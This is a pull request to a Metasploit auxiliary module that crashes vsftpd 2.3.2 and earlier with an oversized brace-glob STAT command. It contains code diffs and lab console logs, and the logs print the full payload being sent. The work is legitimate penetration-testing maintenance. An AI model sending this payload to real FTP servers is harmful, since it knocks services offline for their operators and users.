### PR TITLE
vsftpd_232: Misc fix ups

### DIFF
--- a/modules/auxiliary/dos/ftp/vsftpd_232.rb
+++ b/modules/auxiliary/dos/ftp/vsftpd_232.rb
@@ -38,6 +38,10 @@ class MetasploitModule < Msf::Auxiliary
         }
       )
     )
+
+    register_options([
+      OptInt.new('MAX_ATTEMPTS', [false, 'Maximum payload attempts before giving up (0 = unlimited)', 25])
+    ])
   end
 
   def check
@@ -53,12 +57,21 @@ class MetasploitModule < Msf::Auxiliary
     vprint_status("FTP banner: #{sanitize_ftp_response(banner)}") if banner
 
     s = ''
+    attempts = 0
+    max = datastore['MAX_ATTEMPTS']
     loop do
+      attempts += 1
+
       # get each line until our desired line shows or end line shows
       s = send_cmd(['STAT'], true)
       return Exploit::CheckCode::Unknown('No response received for STAT') unless s
 
       break if (s =~ /vsFTPd \d+\.\d+\.\d+/) || (s == "211 End of status\r\n")
+
+      if max > 0 && attempts >= max
+        print_error("Reached #{max} attempts")
+        break
+      end
     end
 
     vprint_status("STAT: #{s}")
@@ -86,9 +99,18 @@ class MetasploitModule < Msf::Auxiliary
     payload = 'STAT ' + '{{*},' * 487 + '{.}' + '}' * 487
     vprint_status("FTP DoS command: #{payload}")
 
+    attempts = 0
+    max = datastore['MAX_ATTEMPTS']
     loop do
-      print_status('Sending DoS command')
+      attempts += 1
+      if max > 0 && attempts >= max
+        print_error("Reached #{max} attempts without DoS")
+        break
+      end
+      print_status("Attempt: #{attempts}/#{max} - Sending DoS command")
+
       connect_login
+
       10.times do
         send_cmd([payload.to_s], false)
       end

--- a/modules/auxiliary/dos/ftp/vsftpd_232.rb
+++ b/modules/auxiliary/dos/ftp/vsftpd_232.rb
@@ -48,14 +48,22 @@ class MetasploitModule < Msf::Auxiliary
   def check
     # attempt to connect
     begin
-      return Exploit::CheckCode::Unknown('Failed to connect or authenticate via FTP') unless connect_login
+      connect
     rescue Rex::ConnectionRefused
       return Exploit::CheckCode::Unknown('Connection refused by the target')
     rescue Rex::ConnectionTimeout
       return Exploit::CheckCode::Unknown('Connection timed out')
     end
 
-    vprint_status("FTP banner: #{sanitize_ftp_response(banner)}") if banner
+    return Exploit::CheckCode::Safe("Does not appear to be VSFTPD (banner: #{banner_version})") unless banner&.downcase&.include?('vsftpd')
+
+    vprint_status("FTP banner: #{banner_version}") if banner
+
+    res = send_user(user)
+    return Exploit::CheckCode::Unknown("Failed to connect or authenticate via FTP: #{res}") unless res =~ /^(331|2)/
+
+    res = send_pass(pass)
+    return Exploit::CheckCode::Unknown("Failed to connect or authenticate via FTP: #{res}") unless res =~ /^2/
 
     s = ''
     stat_output = ''
@@ -122,12 +130,19 @@ class MetasploitModule < Msf::Auxiliary
       end
       print_status("Attempt: #{attempts}/#{max} - Sending DoS command")
 
-      connect_login
+      unless connect_login
+        print_error('Authentication failed - check FTPUSER/FTPPASS credentials')
+        break
+      end
 
       10.times do
         send_cmd([payload.to_s], false)
       end
       send_cmd([payload.to_s], true)
+
+      # Otherwise report_service has a bad time
+      disconnect
+      @ftpbuff = ''
     rescue Rex::ConnectionTimeout
       print_error('Connection timeout! Sending again')
     rescue Errno::ECONNRESET

--- a/modules/auxiliary/dos/ftp/vsftpd_232.rb
+++ b/modules/auxiliary/dos/ftp/vsftpd_232.rb
@@ -56,6 +56,8 @@ class MetasploitModule < Msf::Auxiliary
     loop do
       # get each line until our desired line shows or end line shows
       s = send_cmd(['STAT'], true)
+      return Exploit::CheckCode::Unknown('No response received for STAT') unless s
+
       break if (s =~ /vsFTPd \d+\.\d+\.\d+/) || (s == "211 End of status\r\n")
     end
     disconnect
@@ -99,6 +101,7 @@ class MetasploitModule < Msf::Auxiliary
     rescue Rex::ConnectionRefused
       print("\n")
       print_good('Connection refused! Appears DOS attack succeeded.')
+      break
     rescue EOFError
       print("\n")
       print_good('Stream was cut off abruptly. Appears DOS attack succeeded.')

--- a/modules/auxiliary/dos/ftp/vsftpd_232.rb
+++ b/modules/auxiliary/dos/ftp/vsftpd_232.rb
@@ -68,7 +68,7 @@ class MetasploitModule < Msf::Auxiliary
     end
 
     # pull out version and check if its in range of vulnerability
-    version = s[/\d+\.\d+\.\d+/]
+    version = s[/vsFTPd (\d+\.\d+\.\d+)/, 1]
     if Rex::Version.new(version) < Rex::Version.new('2.3.3')
       Exploit::CheckCode::Appears("vsFTPd #{version} is older than the patched version 2.3.3")
     else

--- a/modules/auxiliary/dos/ftp/vsftpd_232.rb
+++ b/modules/auxiliary/dos/ftp/vsftpd_232.rb
@@ -6,6 +6,7 @@
 class MetasploitModule < Msf::Auxiliary
   include Msf::Exploit::Remote::Ftp
   include Msf::Auxiliary::Dos
+  prepend Msf::Exploit::Remote::AutoCheck
 
   def initialize(info = {})
     super(
@@ -94,8 +95,6 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def run
-    fail_with(Failure::NotVulnerable, 'Target is not vulnerable') if check != Exploit::CheckCode::Appears
-
     payload = 'STAT ' + '{{*},' * 487 + '{.}' + '}' * 487
     vprint_status("FTP DoS command: #{payload}")
 

--- a/modules/auxiliary/dos/ftp/vsftpd_232.rb
+++ b/modules/auxiliary/dos/ftp/vsftpd_232.rb
@@ -11,16 +11,18 @@ class MetasploitModule < Msf::Auxiliary
     super(
       update_info(
         info,
-        'Name'	=> 'VSFTPD 2.3.2 Denial of Service',
-        'Description'	=> %q{
+        'Name' => 'VSFTPD 2.3.2 and Earlier STAT Denial of Service',
+        'Description' => %q{
           This module triggers a Denial of Service condition in the VSFTPD server in
-          versions before 2.3.3. So far, it has been tested on 2.3.0, 2.3.1, and 2.3.2.
+          versions before 2.3.3 (tested on 2.3.0, 2.3.1, and 2.3.2).
+          Version 2.3.3 and higher should not be vulnerable.
         },
         'Author' => [
           'Nick Cottrell (Rad10Logic) <ncottrellweb[at]gmail.com>', # Module Creator
           'Anna Graterol <annagraterol95[at]gmail.com>', # Vuln researcher
           'Mana Mostaani <mana.mostaani[at]gmail.com>',
-          'Maksymilian Arciemowicz' # Original EDB PoC
+          'Maksymilian Arciemowicz', # Original EDB PoC
+          'g0tmi1k' # @g0tmi1k - additional features
         ],
         'License' => MSF_LICENSE,
         'References' => [
@@ -41,17 +43,15 @@ class MetasploitModule < Msf::Auxiliary
   def check
     # attempt to connect
     begin
-      if !connect_login
-        print_error('Connection refused.')
-        return Exploit::CheckCode::Unknown('Failed to connect or authenticate via FTP')
-      end
+      return Exploit::CheckCode::Unknown('Failed to connect or authenticate via FTP') unless connect_login
     rescue Rex::ConnectionRefused
-      print_error('Connection refused.')
       return Exploit::CheckCode::Unknown('Connection refused by the target')
     rescue Rex::ConnectionTimeout
-      print_error('Connection timed out')
       return Exploit::CheckCode::Unknown('Connection timed out')
     end
+
+    vprint_status("FTP banner: #{sanitize_ftp_response(banner)}") if banner
+
     s = ''
     loop do
       # get each line until our desired line shows or end line shows
@@ -60,53 +60,51 @@ class MetasploitModule < Msf::Auxiliary
 
       break if (s =~ /vsFTPd \d+\.\d+\.\d+/) || (s == "211 End of status\r\n")
     end
-    disconnect
+
+    vprint_status("STAT: #{s}")
+
     # check if version was found
     if s !~ /vsFTPd \d+\.\d+\.\d+/
-      print_error('Did not find FTP version in FTP session.')
-      return Exploit::CheckCode::Unknown('Could not determine vsFTPd version')
+      print_error('Did not find FTP version in FTP session')
+      return Exploit::CheckCode::Unknown('Could not determine VSFTPD version')
     end
 
     # pull out version and check if its in range of vulnerability
     version = s[/vsFTPd (\d+\.\d+\.\d+)/, 1]
     if Rex::Version.new(version) < Rex::Version.new('2.3.3')
-      Exploit::CheckCode::Appears("vsFTPd #{version} is older than the patched version 2.3.3")
+      Exploit::CheckCode::Appears("VSFTPD #{version} is vulnerable (affected: <= 2.3.2)")
     else
-      Exploit::CheckCode::Safe("vsFTPd #{version} is not vulnerable")
+      Exploit::CheckCode::Safe("VSFTPD #{version} is not vulnerable (affected: <= 2.3.2)")
     end
+  ensure
+    disconnect
   end
 
   def run
-    fail_with(Failure::NotVulnerable, 'Target is not vulnerable.') if check != Exploit::CheckCode::Appears
+    fail_with(Failure::NotVulnerable, 'Target is not vulnerable') if check != Exploit::CheckCode::Appears
 
     payload = 'STAT ' + '{{*},' * 487 + '{.}' + '}' * 487
-
-    vprint_status("Payload being sent: #{payload}")
-    print_status('sending payload')
+    vprint_status("FTP DoS command: #{payload}")
 
     loop do
-      print('.')
+      print_status('Sending DoS command')
       connect_login
       10.times do
         send_cmd([payload.to_s], false)
       end
       send_cmd([payload.to_s], true)
-      disconnect
     rescue Rex::ConnectionTimeout
-      print("\n")
       print_error('Connection timeout! Sending again')
     rescue Errno::ECONNRESET
-      print("\n")
       print_error('Connection reset!')
     rescue Rex::ConnectionRefused
-      print("\n")
-      print_good('Connection refused! Appears DOS attack succeeded.')
+      print_good('Connection refused! Appears DoS attack succeeded')
       break
     rescue EOFError
-      print("\n")
-      print_good('Stream was cut off abruptly. Appears DOS attack succeeded.')
+      print_good('Stream was cut off abruptly. Appears DoS attack succeeded')
       break
     end
+  ensure
     disconnect
   end
 end

--- a/modules/auxiliary/dos/ftp/vsftpd_232.rb
+++ b/modules/auxiliary/dos/ftp/vsftpd_232.rb
@@ -58,6 +58,7 @@ class MetasploitModule < Msf::Auxiliary
     vprint_status("FTP banner: #{sanitize_ftp_response(banner)}") if banner
 
     s = ''
+    stat_output = ''
     attempts = 0
     max = datastore['MAX_ATTEMPTS']
     loop do
@@ -67,6 +68,7 @@ class MetasploitModule < Msf::Auxiliary
       s = send_cmd(['STAT'], true)
       return Exploit::CheckCode::Unknown('No response received for STAT') unless s
 
+      stat_output << s
       break if (s =~ /vsFTPd \d+\.\d+\.\d+/) || (s == "211 End of status\r\n")
 
       if max > 0 && attempts >= max
@@ -75,7 +77,19 @@ class MetasploitModule < Msf::Auxiliary
       end
     end
 
-    vprint_status("STAT: #{s}")
+    stat_output.strip.each_line.with_index do |line, i|
+      prefix = i == 0 ? 'STAT: ' : '  '
+      vprint_status("#{prefix}#{line.strip}")
+    end
+
+    report_note(
+      host: rhost,
+      port: rport,
+      proto: 'tcp',
+      sname: 'ftp',
+      type: 'ftp.cmd.stat',
+      data: { username: user, output: stat_output.strip }
+    )
 
     # check if version was found
     if s !~ /vsFTPd \d+\.\d+\.\d+/


### PR DESCRIPTION
This isn't anything major, was just little misc items:

- Doesn't force a "forever DoS loop" by default
  - Also breaks earlier too
- Update workspace more (`report_service()`/`report_vuln()`/`report_note()`)
- Switch from c`onnect_login()` -> `connect()` (able to troubleshoot more)
- Clean up output
- Use AutoCheck mixin

```
        current  name     hosts  services  vulns  creds  loots  notes
        -------  ----     -----  --------  -----  -----  -----  -----
Before: *        default  1      4         0      0      0      2
After:  *        default  1      4         0      0      0      3
```

Target is Metasploitable 2 (but its not vulnerable to it).

## Before

- Couldn't force running exploit

```console
$ ./msfconsole -q -x 'db_status; workspace -D; setg VERBOSE true;
use auxiliary/dos/ftp/vsftpd_232;
set RHOSTS 10.0.0.10;
run;
set RPORT 2121;
run;'
[*] Connected to msf. Connection type: postgresql.
[*] Deleted workspace: default
[*] Recreated the default workspace
VERBOSE => true
RHOSTS => 10.0.0.10
[*] Running module against 10.0.0.10
[*] 10.0.0.10:21 - Connecting to FTP server...
[*] 10.0.0.10:21 - Connected to target FTP server
[*] 10.0.0.10:21 - Authenticating as anonymous with password mozilla@example.com...
[*] 10.0.0.10:21 - Sending password...
[-] 10.0.0.10:21 - Auxiliary aborted due to failure: not-vulnerable: Target is not vulnerable.
[*] Auxiliary module execution completed
RPORT => 2121
[*] Running module against 10.0.0.10
[*] 10.0.0.10:2121 - Connecting to FTP server...
[*] 10.0.0.10:2121 - Connected to target FTP server
[*] 10.0.0.10:2121 - Authenticating as anonymous with password mozilla@example.com...
[*] 10.0.0.10:2121 - Sending password...
[-] 10.0.0.10:2121 - The server rejected our password
[-] 10.0.0.10:2121 - Connection refused.
[-] 10.0.0.10:2121 - Auxiliary aborted due to failure: not-vulnerable: Target is not vulnerable.
[*] Auxiliary module execution completed
msf auxiliary(dos/ftp/vsftpd_232) > workspace -v

Workspaces
==========

current  name     hosts  services  vulns  creds  loots  notes
-------  ----     -----  --------  -----  -----  -----  -----
*        default  1      4         0      0      0      2

msf auxiliary(dos/ftp/vsftpd_232) > hosts

Hosts
=====

address    mac  name  os_name  os_flavor  os_sp  purpose  info  comments
-------    ---  ----  -------  ---------  -----  -------  ----  --------
10.0.0.10             Unknown                    device

msf auxiliary(dos/ftp/vsftpd_232) > services
Services
========

host       port  proto  name  state  info                           resource  parents
----       ----  -----  ----  -----  ----                           --------  -------
10.0.0.10  21    tcp    ftp   open   vsFTPd 2.3.4                   {}        tcp (21/tcp)
10.0.0.10  21    tcp    tcp   open                                  {}
10.0.0.10  2121  tcp    ftp   open   ProFTPD 1.3.1 Server (Debian)  {}        tcp (2121/tcp)
10.0.0.10  2121  tcp    tcp   open                                  {}

msf auxiliary(dos/ftp/vsftpd_232) > notes

Notes
=====

 Time                     Host       Service  Port  Protocol  Type        Data
 ----                     ----       -------  ----  --------  ----        ----
 2026-05-21 09:41:38 UTC  10.0.0.10  ftp      21    tcp       ftp.banner  {:banner=>"220 (vsFTPd 2.3.4)"}
 2026-05-21 09:41:38 UTC  10.0.0.10  ftp      2121  tcp       ftp.banner  {:banner=>"220 ProFTPD 1.3.1 Server (Debian) [::ffff:10.0.0.10]"}

msf auxiliary(dos/ftp/vsftpd_232) >
```

## After

- Able to force exploit
- More items in workspace

```console
$ ./msfconsole -q -x 'db_status; workspace -D; setg VERBOSE true;
use auxiliary/dos/ftp/vsftpd_232;
set RHOSTS 10.0.0.10;
run;
set RPORT 2121;
run;'
[*] Connected to msf. Connection type: postgresql.
[*] Deleted workspace: default
[*] Recreated the default workspace
VERBOSE => true
RHOSTS => 10.0.0.10
[*] Running module against 10.0.0.10
[*] 10.0.0.10:21 - Running automatic check ("set AutoCheck false" to disable)
[*] 10.0.0.10:21 - Connecting to FTP server...
[*] 10.0.0.10:21 - Connected to target FTP server
[*] 10.0.0.10:21 - FTP banner: vsFTPd 2.3.4
[*] 10.0.0.10:21 - STAT: 211-FTP server status:
[*] 10.0.0.10:21 -   Connected to 10.0.0.1
[*] 10.0.0.10:21 -   Logged in as ftp
[*] 10.0.0.10:21 -   TYPE: ASCII
[*] 10.0.0.10:21 -   No session bandwidth limit
[*] 10.0.0.10:21 -   Session timeout in seconds is 300
[*] 10.0.0.10:21 -   Control connection is plain text
[*] 10.0.0.10:21 -   Data connections will be plain text
[*] 10.0.0.10:21 -   vsFTPd 2.3.4 - secure, fast, stable
[*] 10.0.0.10:21 -   211 End of status
[-] 10.0.0.10:21 - Auxiliary aborted due to failure: not-vulnerable: The target is not exploitable. VSFTPD 2.3.4 is not vulnerable (affected: <= 2.3.2) "set ForceExploit true" to override check result.
[*] Auxiliary module execution completed
RPORT => 2121
[*] Running module against 10.0.0.10
[*] 10.0.0.10:2121 - Running automatic check ("set AutoCheck false" to disable)
[*] 10.0.0.10:2121 - Connecting to FTP server...
[*] 10.0.0.10:2121 - Connected to target FTP server
[-] 10.0.0.10:2121 - Auxiliary aborted due to failure: not-vulnerable: The target is not exploitable. Does not appear to be VSFTPD (banner: ProFTPD 1.3.1 Server (Debian)) "set ForceExploit true" to override check result.
[*] Auxiliary module execution completed
msf auxiliary(dos/ftp/vsftpd_232) >
msf auxiliary(dos/ftp/vsftpd_232) >
msf auxiliary(dos/ftp/vsftpd_232) >
msf auxiliary(dos/ftp/vsftpd_232) > set ForceExploit true
ForceExploit => true
msf auxiliary(dos/ftp/vsftpd_232) > run
[*] Running module against 10.0.0.10
[*] 10.0.0.10:2121 - Running automatic check ("set AutoCheck false" to disable)
[*] 10.0.0.10:2121 - Connecting to FTP server...
[*] 10.0.0.10:2121 - Connected to target FTP server
[!] 10.0.0.10:2121 - The target is not exploitable. Does not appear to be VSFTPD (banner: ProFTPD 1.3.1 Server (Debian)) ForceExploit is enabled, proceeding with exploitation.
[*] 10.0.0.10:2121 - FTP DoS command: STAT {{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{.}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}
[*] 10.0.0.10:2121 - Attempt: 1/25 - Sending DoS command
[*] 10.0.0.10:2121 - Connecting to FTP server...
[*] 10.0.0.10:2121 - Connected to target FTP server
[*] 10.0.0.10:2121 - Authenticating as anonymous with password mozilla@example.com...
[*] 10.0.0.10:2121 - Sending password...
[-] 10.0.0.10:2121 - The server rejected our password
[-] 10.0.0.10:2121 - Authentication failed — check FTPUSER/FTPPASS credentials
[*] Auxiliary module execution completed
msf auxiliary(dos/ftp/vsftpd_232) >
msf auxiliary(dos/ftp/vsftpd_232) >
msf auxiliary(dos/ftp/vsftpd_232) >
msf auxiliary(dos/ftp/vsftpd_232) > set RPORT 21
RPORT => 21
msf auxiliary(dos/ftp/vsftpd_232) > run
[*] Running module against 10.0.0.10
[*] 10.0.0.10:21 - Running automatic check ("set AutoCheck false" to disable)
[*] 10.0.0.10:21 - Connecting to FTP server...
[*] 10.0.0.10:21 - Connected to target FTP server
[*] 10.0.0.10:21 - FTP banner: vsFTPd 2.3.4
[*] 10.0.0.10:21 - STAT: 211-FTP server status:
[*] 10.0.0.10:21 -   Connected to 10.0.0.1
[*] 10.0.0.10:21 -   Logged in as ftp
[*] 10.0.0.10:21 -   TYPE: ASCII
[*] 10.0.0.10:21 -   No session bandwidth limit
[*] 10.0.0.10:21 -   Session timeout in seconds is 300
[*] 10.0.0.10:21 -   Control connection is plain text
[*] 10.0.0.10:21 -   Data connections will be plain text
[*] 10.0.0.10:21 -   vsFTPd 2.3.4 - secure, fast, stable
[*] 10.0.0.10:21 -   211 End of status
[!] 10.0.0.10:21 - The target is not exploitable. VSFTPD 2.3.4 is not vulnerable (affected: <= 2.3.2) ForceExploit is enabled, proceeding with exploitation.
[*] 10.0.0.10:21 - FTP DoS command: STAT {{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{.}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}
[*] 10.0.0.10:21 - Attempt: 1/25 - Sending DoS command
[*] 10.0.0.10:21 - Connecting to FTP server...
[*] 10.0.0.10:21 - Connected to target FTP server
[*] 10.0.0.10:21 - Authenticating as anonymous with password mozilla@example.com...
[*] 10.0.0.10:21 - Sending password...
[...]
[*] 10.0.0.10:21 - Sending password...
[-] 10.0.0.10:21 - Reached 25 attempts without DoS
[*] Auxiliary module execution completed
msf auxiliary(dos/ftp/vsftpd_232) >
msf auxiliary(dos/ftp/vsftpd_232) > workspace -v

Workspaces
==========

current  name     hosts  services  vulns  creds  loots  notes
-------  ----     -----  --------  -----  -----  -----  -----
*        default  1      4         0      0      0      3

msf auxiliary(dos/ftp/vsftpd_232) > hosts

Hosts
=====

address    mac  name  os_name  os_flavor  os_sp  purpose  info  comments
-------    ---  ----  -------  ---------  -----  -------  ----  --------
10.0.0.10             Unknown                    device

msf auxiliary(dos/ftp/vsftpd_232) > services
Services
========

host       port  proto  name  state  info                           resource  parents
----       ----  -----  ----  -----  ----                           --------  -------
10.0.0.10  21    tcp    ftp   open   vsFTPd 2.3.4                   {}        tcp (21/tcp)
10.0.0.10  21    tcp    tcp   open                                  {}
10.0.0.10  2121  tcp    ftp   open   ProFTPD 1.3.1 Server (Debian)  {}        tcp (2121/tcp)
10.0.0.10  2121  tcp    tcp   open                                  {}

msf auxiliary(dos/ftp/vsftpd_232) > notes

Notes
=====

 Time                     Host       Service  Port  Protocol  Type          Data
 ----                     ----       -------  ----  --------  ----          ----
 2026-05-21 12:04:34 UTC  10.0.0.10  ftp      21    tcp       ftp.banner    {:banner=>"220 (vsFTPd 2.3.4)"}
 2026-05-21 12:04:34 UTC  10.0.0.10  ftp      21    tcp       ftp.cmd.stat  {:username=>"anonymous", :output=>"211-FTP server status:\r\n     Connected to 10.0.0.1\r\n     Logged in as ftp\r\n     TYPE: ASC
                                                                            II\r\n     No session bandwidth limit\r\n     Session timeout in seconds is 300\r\n     Control connection is plain text\r\n     D
                                                                            ata connections will be plain text\r\n     vsFTPd 2.3.4 - secure, fast, stable\r\n211 End of status"}
 2026-05-21 12:04:34 UTC  10.0.0.10  ftp      2121  tcp       ftp.banner    {:banner=>"220 ProFTPD 1.3.1 Server (Debian) [::ffff:10.0.0.10]"}

